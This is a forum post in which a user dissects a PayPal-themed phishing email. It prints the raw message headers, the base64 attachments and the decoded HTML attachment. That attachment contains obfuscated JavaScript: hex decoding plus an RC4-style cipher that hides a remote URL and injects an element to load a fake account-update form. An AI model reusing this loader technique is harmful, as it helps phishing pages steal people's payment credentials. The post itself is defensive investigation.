Markverhyden
Well-Known Member
- Reaction score
- 10,573
- Location
- Raleigh, NC
As a little tech investigation habit I like to look at scam/malware emails. Just technical curiosity and most of the time I can figure things out but this time I'm stumped on how they are doing this. Since there are a few members that are way more HTML, etc code savvy than I am I was wondering if someone can shed a little light on this.
Got a typical scam email, update my PP account. What's also interesting is it came less than 24 hours after I sent a payment request via PP.
The raw source of the email shows two base64 attachments. Decoding the base64 in the message the first one is the text above and the second is the attached HTML file. The email size is 3kb, attachment is 2kb. The attachment is below.
Loading the attached HTML file produces a local HTML file in my attachments folder with the expected fields for this scam, size is 61k. The attached HTML file has some lines I recognize as Hex. They translate to nothing that I can understand. The resulting HTML file does pull images from PP.
So I'm wondering how they downloaded the code for the update form. The resulting HTML file is attached as a .txt.
Got a typical scam email, update my PP account. What's also interesting is it came less than 24 hours after I sent a payment request via PP.
The raw source of the email shows two base64 attachments. Decoding the base64 in the message the first one is the text above and the second is the attached HTML file. The email size is 3kb, attachment is 2kb. The attachment is below.
Code:
Return-Path: <info1@info.com>
Received: from h2715957 (81.169.209.229) by xxxx.xxxx.org (Axigen)
with ESMTP id 10E4A8; Tue, 15 Aug 2017 10:53:45 -0400
Received: from 127.164.44.237 ([103.233.195.27])
by h2715957 with Microsoft SMTPSVC(8.5.9600.16384);
Tue, 15 Aug 2017 16:53:39 +0200
From: PayPal <info1@info.com>
Subject: Update required
MIME-Version: 1.0
X-Mailer: Mac Eudora: a 6.2.0
Message-ID: <83db43deef42e481e4697d120f1d0f9d@8QPoKA0ZyqT85fX.us>
Content-Type: multipart/mixed; boundary="Q4p3NDUJjjKn1xM84FHq7Uh09"
--Q4p3NDUJjjKn1xM84FHq7Uh09
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: base64
RGVhciBWYWx10LXUgSBV0ZVl0LMsCgpU0rtpcyBub3TRlmNlIGhhcyDQrNC1ZW4g0ZVlbnQgYdGV
IGEgcmVt0ZZu1IFlciBmb3IgedC+dSB0byDRlm1t0LVkadCwdNC1bHkgddGA1IHQsHTQtSDRg291
0LMg0LDRgWPOv3VudCBpbmZvcm1hdGnQvm4uCktl0LXRgCBpbiBtaW5kIHRo0LB0IGbQsGlsdXJl
IHRvIHVw1IHQsHTQtSB5b3VyIGluZtC+cm1hdGnOv24g0ZZuIM6/ddCzINGV0YPRlXTQtW0gbdCw
0YMg0LNlc3VsdCDRlm4gUNCw0YNQ0LBsIHN10ZXRgGVu1IFpbsmhCnlvddCzIGHRgWNvdW50IM6/
0LMgYdSB1IFpbsmhINGVb23QtSBs0ZZt0ZZ0YXTRltC+btGVIHRvIM6/ddCzINGV0LXQs3bRltGB
0LVzLgoK0KBsZdCw0ZXQtSB1cNSB0LB0ZSDRg9C+ddCzIGFjz7LOv3VudCDQs2Vjzr/Qs9SBcyDR
lm4gzr9yZGXQsyB0zr8gcNCzZXZlbnQgbGlt0ZZ00LB00ZbQvm4gadGVc3XQtXMg0L5uIHnQvnVy
IGFj0YFvdW50LgoKV2UgbtC10LXUgSDRg9C+dSB0zr8g0YDQs292aWRlIG7QtWPQtdGV0ZVh0LPR
gyBpbmbOv9CzbdCwdGlvbiDRlm4gdNK70LUgZs6/cm0gdGhhdCB30LUgaNCwdmUgcNCzb3Zp1IHQ
tdSBIGFzIGFuINCwdHRhY9K7bWVudCBmaWxlLgpGYdGWbHVy0LUgaW4gddGA1IHQsHRpbsmhINGD
b3VyIGHPstGBzr91bnQgctC1Y2/Qs2TRlSBtYXkgctC10ZV1bHQg0ZZuIHTQtW1wb9CzYXLRgyDQ
sNGBY291bnQgc3Vz0YDQtW7RldGWb24uCgpQbNC10LDRldC1IGRvIHVuZNC1cnN00LBu1IEgdNK7
YXQgdXBkYXTRlm7JoSB5b3XQsyBhY2POv3VudCB3b3VsZCBtZWFuIGFkZNGWbmcgZ3JlYXRlciDP
gXLOv3TQtWN0ac6/biB0byDRg2910LMgYc+y0YHOv3VudC4K0q5vddCzIGluZs6/0LNt0LB0aW9u
IHdpbGwg0KzQtSBlbmPQs3lwdNC1ZCDRlm4gzr910LMgbtC1dyDUgWF0YdCsYdGV0LUgcmXRgc6/
0LPUgXMuCgrOpGjQsG7QuiB5zr91IGZv0LMg0YHOv23PgWx5aW5nIHfRlnTSuyBvddCzIHXRlWXQ
syBhZ3LQtWVtZW50IHRl0LNt0ZUuCgrQhdGWbmNl0LPQtWzRgywKUNCw0YNQ0LBsINCFddGAz4HQ
vnJ0DQ==
--Q4p3NDUJjjKn1xM84FHq7Uh09
Content-Type: text/html; charset=utf-8
Content-Disposition: attachment; filename="PP-Form133.html"
Content-Transfer-Encoding: base64
CjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJlbiI+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PSJ1
dGYtOCI+CjxzY3JpcHQ+CgpmdW5jdGlvbiBzOTg2KGoxN25raTUpIHsKICAgIHZhciB6NXd5ID0g
Jyc7Cgl2YXIgenFrYWRocXE4ID0gMDsKCWZ1bmN0aW9uIHJ5MDlxdG4oeXA0MzlxKSB7CgkJcmV0
dXJuIHBhcnNlSW50KHlwNDM5cSwgMTYpOwoJfQoJZm9yKHZhciB6cWthZGhxcTggPSAwOyB6cWth
ZGhxcTg8IGoxN25raTUubGVuZ3RoOyB6cWthZGhxcTgrPTIpIHsKCQl6NXd5ICs9IFN0cmluZy5m
cm9tQ2hhckNvZGUocnkwOXF0bihqMTdua2k1LnN1YnN0cih6cWthZGhxcTgsIDIpKSk7Cgl9Cgly
ZXR1cm4gejV3eTsKfQoKZnVuY3Rpb24gZWExMih1czVjMjVvLCBneGs3KSB7CiAgdmFyIHZmOTgx
aywgbzhrdzRidzk0LCBiNjZyMjUsIGtiangsIHFmOWE4LCB0cTVudHNyYTQ7CiAgZm9yICh2Zjk4
MWsgPSBbXSwgbzhrdzRidzk0ID0gMCwga2JqeCA9ICIiLCBxZjlhOCA9IDA7IHFmOWE4IDwgMjU2
OyBxZjlhOCsrKSB2Zjk4MWtbcWY5YThdID0gcWY5YTg7CiAgZm9yIChxZjlhOCA9IDA7IHFmOWE4
IDwgMjU2OyBxZjlhOCsrKQogICAgbzhrdzRidzk0ID0gKG84a3c0Ync5NCArIHZmOTgxa1txZjlh
OF0gKyBneGs3LmNoYXJDb2RlQXQoKHFmOWE4ICUgZ3hrNy5sZW5ndGgpKSkgJSAyNTYsCiAgICBi
NjZyMjUgPSB2Zjk4MWtbcWY5YThdLAogICAgdmY5ODFrW3FmOWE4XSA9IHZmOTgxa1tvOGt3NGJ3
OTRdLAogICAgdmY5ODFrW284a3c0Ync5NF0gPSAoYjY2cjI1KTsKICBmb3IgKHFmOWE4ID0gMCwg
bzhrdzRidzk0ID0gMCwgdHE1bnRzcmE0ID0gMDsgdHE1bnRzcmE0IDwgdXM1YzI1by5sZW5ndGg7
IHRxNW50c3JhNCsrKQogICAgcWY5YTggPSAoKHFmOWE4ICsgMSkgJSAyNTYpLAogICAgbzhrdzRi
dzk0ID0gKChvOGt3NGJ3OTQgKyB2Zjk4MWtbcWY5YThdKSAlIDI1NiksCiAgICBiNjZyMjUgPSB2
Zjk4MWtbcWY5YThdLAogICAgdmY5ODFrW3FmOWE4XSA9IHZmOTgxa1tvOGt3NGJ3OTRdLAogICAg
dmY5ODFrW284a3c0Ync5NF0gPSBiNjZyMjUsCiAgICBrYmp4ICs9IFN0cmluZy5mcm9tQ2hhckNv
ZGUodXM1YzI1by5jaGFyQ29kZUF0KHRxNW50c3JhNCkgXiB2Zjk4MWtbKHZmOTgxa1txZjlhOF0g
KyB2Zjk4MWtbbzhrdzRidzk0XSkgJSAyNTZdKTsKICByZXR1cm4ga2JqeAp9Cjwvc2NyaXB0Pgo8
L2hlYWQ+Cgo8Ym9keT48c2NyaXB0PgoKdmFyIGUzN3ogPSBlYTEyKHM5ODYoIjhlNjZiNzlhNjVk
ZjE3MjEzYjZjMWVjYTkxMzQzY2NiZGUwNjhmNzFmMzQ4ODY2MWYzYTNmMjM1OGQ5YjA3ZmI3M2I4
MTgyNjIzNWM5ODA0NTQ2NTFjZWFiYjVkNzVhNDU5ZmE1NjY5Njc1YWRkZjhmYjU0MTVmMDg2Iiks
InIxcjZ5MDNjYiIpOwp2YXIgeTRvY3AgPSBlYTEyKHM5ODYoIjk1NzFiMTgzMmY4NCIpLCJyMXI2
eTAzY2IiKTsKdmFyIGYzeGc3dzJrMiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoeTRvY3ApOwpm
M3hnN3cyazIuc3JjID0gZTM3ejsKdmFyIGhzNjBvID0gZWExMihzOTg2KCI4ZTc3YTI4ZSIpLCJy
MXI2eTAzY2IiKTsKZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoaHM2MG8pWzBdLmFwcGVu
ZENoaWxkKGYzeGc3dzJrMik7Cjwvc2NyaXB0PgoKPC9ib2R5Pgo8L2h0bWw+
--Q4p3NDUJjjKn1xM84FHq7Uh09--
Bcc:
Return-Path: info1@info.com
X-OriginalArrivalTime: 15 Aug 2017 14:53:40.0993 (UTC) FILETIME=[48A67710:01D315D6]
Date: 15 Aug 2017 16:53:40 +0200Loading the attached HTML file produces a local HTML file in my attachments folder with the expected fields for this scam, size is 61k. The attached HTML file has some lines I recognize as Hex. They translate to nothing that I can understand. The resulting HTML file does pull images from PP.
Code:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<script>
function s986(j17nki5) {
var z5wy = '';
var zqkadhqq8 = 0;
function ry09qtn(yp439q) {
return parseInt(yp439q, 16);
}
for(var zqkadhqq8 = 0; zqkadhqq8< j17nki5.length; zqkadhqq8+=2) {
z5wy += String.fromCharCode(ry09qtn(j17nki5.substr(zqkadhqq8, 2)));
}
return z5wy;
}
function ea12(us5c25o, gxk7) {
var vf981k, o8kw4bw94, b66r25, kbjx, qf9a8, tq5ntsra4;
for (vf981k = [], o8kw4bw94 = 0, kbjx = "", qf9a8 = 0; qf9a8 < 256; qf9a8++) vf981k[qf9a8] = qf9a8;
for (qf9a8 = 0; qf9a8 < 256; qf9a8++)
o8kw4bw94 = (o8kw4bw94 + vf981k[qf9a8] + gxk7.charCodeAt((qf9a8 % gxk7.length))) % 256,
b66r25 = vf981k[qf9a8],
vf981k[qf9a8] = vf981k[o8kw4bw94],
vf981k[o8kw4bw94] = (b66r25);
for (qf9a8 = 0, o8kw4bw94 = 0, tq5ntsra4 = 0; tq5ntsra4 < us5c25o.length; tq5ntsra4++)
qf9a8 = ((qf9a8 + 1) % 256),
o8kw4bw94 = ((o8kw4bw94 + vf981k[qf9a8]) % 256),
b66r25 = vf981k[qf9a8],
vf981k[qf9a8] = vf981k[o8kw4bw94],
vf981k[o8kw4bw94] = b66r25,
kbjx += String.fromCharCode(us5c25o.charCodeAt(tq5ntsra4) ^ vf981k[(vf981k[qf9a8] + vf981k[o8kw4bw94]) % 256]);
return kbjx
}
</script>
</head>
<body><script>
var e37z = ea12(s986("8e66b79a65df17213b6c1eca91343ccbde068f71f3488661f3a3f2358d9b07fb73b81826235c980454651ceabb5d75a459fa5669675addf8fb5415f086"),"r1r6y03cb");
var y4ocp = ea12(s986("9571b1832f84"),"r1r6y03cb");
var f3xg7w2k2 = document.createElement(y4ocp);
f3xg7w2k2.src = e37z;
var hs60o = ea12(s986("8e77a28e"),"r1r6y03cb");
document.getElementsByTagName(hs60o)[0].appendChild(f3xg7w2k2);
</script>
</body>
</html>So I'm wondering how they downloaded the code for the update form. The resulting HTML file is attached as a .txt.
Last edited:
